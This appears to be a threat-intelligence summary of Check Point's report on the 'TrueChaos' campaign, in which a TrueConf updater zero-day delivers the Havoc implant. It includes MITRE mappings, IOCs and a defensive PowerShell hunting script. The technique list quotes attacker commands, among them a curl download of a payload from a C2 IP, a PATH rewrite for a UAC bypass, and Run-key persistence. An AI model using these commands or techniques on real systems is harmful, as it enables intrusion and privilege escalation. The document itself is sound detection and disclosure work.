Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets

Check Point Research discovered a zero-day in the TrueConf client (CVE-2026-3502, CVSS 7.8) that allows an attacker controlling an on‑premises TrueConf server to distribute and execute arbitrary files to connected endpoints via the product’s update mechanism. The flaw was abused in a targeted campaign dubbed “TrueChaos” to deploy the Havoc payload against government entities in Southeast Asia. #TrueConf #Havoc

Keypoints

  • Check Point Research identified CVE-2026-3502, a vulnerability in TrueConf’s updater validation that permits malicious updates to be served from a compromised on‑premises server.
  • The vulnerability was exploited in-the-wild in a campaign named “TrueChaos” targeting government entities in Southeast Asia to deliver the Havoc implant.
  • The attack chain used a weaponized TrueConf client update (Inno Setup) that dropped poweriso.exe and a malicious 7z-x64.dll, which was loaded via DLL side-loading.
  • Post-compromise activity included reconnaissance (tasklist, tracert), downloading additional components via FTP/curl, PATH modification and UAC bypass using iscsicpl.exe, and persistence via an HKCU Run registry entry.
  • Check Point links observed activity and infrastructure to Havoc C2 servers (e.g., 47.237.15[.]197) and assesses with moderate confidence the actor is Chinese-nexus.
  • TrueConf released a fix in the Windows client beginning with version 8.5.3 (released March 2026); vulnerable desktop apps remained at 8.5.2 at the time of reporting.
  • Hunting recommendations include looking for unsigned trueconf_windows_update.exe, presence of C:\ProgramData\PowerISO\poweriso.exe, specific registry Run entries, and the trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp execution chain.
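A host-side hunt for the artifacts listed above, added here as an example and not taken from the Check Point report. The search roots under ProgramData and LOCALAPPDATA are assumptions, as is the Sysmon check, which only works where Sysmon process-creation logging is enabled.

```powershell
# Added hunting script (not from the Check Point report). Run as the user whose
# profile is being checked; HKCU and the user PATH are per-user, so other
# profiles need HKU:\<SID> and that hive's Environment key instead.
$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Indicator, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Indicator = $Indicator; Detail = $Detail })
}

# 1. trueconf_windows_update.exe that is not validly signed. Search roots are
#    assumptions: the server-side update storage named in the report plus the
#    usual client download locations.
$roots = @('C:\Program Files\TrueConf Server\ClientInstFiles', $env:ProgramData, $env:LOCALAPPDATA)
foreach ($root in $roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    Get-ChildItem -LiteralPath $root -Filter 'trueconf_windows_update.exe' -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            if ($sig.Status -ne 'Valid') {
                Add-Finding 'Unsigned/invalid TrueConf updater' "$($_.FullName) [$($sig.Status)]"
            }
        }
}

# 2. Side-loading pair dropped by the weaponized update.
foreach ($f in 'C:\ProgramData\PowerISO\poweriso.exe', 'C:\ProgramData\PowerISO\7z-x64.dll') {
    if (Test-Path -LiteralPath $f) { Add-Finding 'Dropped side-loading artifact' $f }
}

# 3. Persistence: HKCU Run value "UpdateCheck" pointing at PowerISO.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -Name 'UpdateCheck' -ErrorAction SilentlyContinue
if ($run -and $run.UpdateCheck -match 'PowerISO') {
    Add-Finding 'Run key persistence' "$runKey\UpdateCheck = $($run.UpdateCheck)"
}

# 4. User PATH rewritten to a writable temp directory, the precondition for the
#    iscsicpl.exe search-order hijack. A legitimate user PATH rarely lives there.
$userPath = [Environment]::GetEnvironmentVariable('Path', 'User')
if ($userPath -and $userPath -match '\\AppData\\Local\\Temp') {
    Add-Finding 'User PATH points at %TEMP%' $userPath
}

# 5. Updater execution chain from Sysmon event ID 1 (silently skipped without Sysmon).
$evt = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'ParentImage:.*trueconf_windows_update\.exe' -and $_.Message -match 'Image:.*trueconf_windows_update\.tmp' }
foreach ($e in $evt) { Add-Finding 'Updater execution chain' "$($e.TimeCreated) Sysmon EID $($e.Id)" }

if ($findings.Count -eq 0) { 'No TrueChaos indicators found.' } else { $findings | Format-Table -AutoSize }
```

A signed updater from a genuine TrueConf release will report Status Valid; anything reported as NotSigned or HashMismatch in an update storage directory deserves a look at the serving server.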

MITRE Techniques

  • [T1195] Supply Chain Compromise – Attackers abused the product update channel of an on‑premises TrueConf server to distribute malicious updates: ‘allows an attacker who controls the on‑premises TrueConf server to distribute and execute arbitrary files across all connected endpoints.’
  • [T1574.001] DLL Search Order Hijacking (DLL Side‑Loading) – The malicious installer dropped 7z-x64.dll and it was loaded through DLL side‑loading: ‘the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso, which was then loaded through DLL side-loading.’
  • [T1574.002] Path Interception by PATH Environment Variable – The attacker modified the user %PATH% to influence DLL resolution and load a malicious iscsiexe.dll: ‘reg add “hkcu\environment” /v path /t REG_SZ /d “C:\users\…\appdata\local\temp” /f … iscsicpl.exe.’
  • [T1548] Abuse Elevation Control Mechanism – UAC bypass was performed by abusing the auto-elevated iscsicpl.exe binary to load a user-controlled DLL and achieve privilege escalation: ‘iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking.’
  • [T1547.001] Registry Run Keys / Startup Folder – The actor established persistence via a user logon autorun registry value pointing to PowerISO: ‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe.’
  • [T1057] Process Discovery – Initial reconnaissance included enumerating running processes using tasklist: ‘tasklist > cache.’
  • [T1016] System Network Configuration Discovery – The actor performed network route/discovery commands such as tracert: ‘tracert 8.8.8.8 -h 5.’
  • [T1105] Ingress Tool Transfer – Additional loader and tooling were retrieved from attacker-controlled FTP/HTTP resources using curl and FTP: ‘curl -u ftpuser: ftp://47.237.15[.]197/update.7z -o … c:\program files\winrar\winrar.exe x update.7z -p …’.
  • [T1071] Application Layer Protocol – Compromised hosts communicated with Havoc C2 infrastructure hosted on remote IPs (e.g., 47.237.15[.]197) for command-and-control: ‘47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure.’

Indicators of Compromise

  • [File name] Malicious TrueConf update and dropped components – trueconf_windows_update.exe (malicious update), poweriso.exe (dropped executable)
  • [File hash] Confirmed malicious artifacts – 22e32bcf113326e366ac480b077067cf (trueconf_windows_update.exe), 248a4d7d4c48478dcbeade8f7dba80b3 (7z-x64.dll), and 1 more hash
  • [IP address] Havoc command-and-control infrastructure – 47.237.15[.]197 (observed C2 and FTP host), 43.134.90[.]60 (Havoc C2)
  • [Registry value] Persistence indicator – HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to C:\ProgramData\PowerISO\PowerISO.exe
  • [File path] Drop and install locations used in the attack – C:\ProgramData\PowerISO\poweriso.exe, C:\Program Files\TrueConf Server\ClientInstFiles (update storage)
  • [URL/FTP] Remote delivery locations used to fetch additional tools – ftp://47.237.15[.]197/update.7z (used with curl/FTP to download update.7z)


Read more: https://research.checkpoint.com/2026/operation-truechaos-0-day-exploitation-against-southeast-asian-government-targets/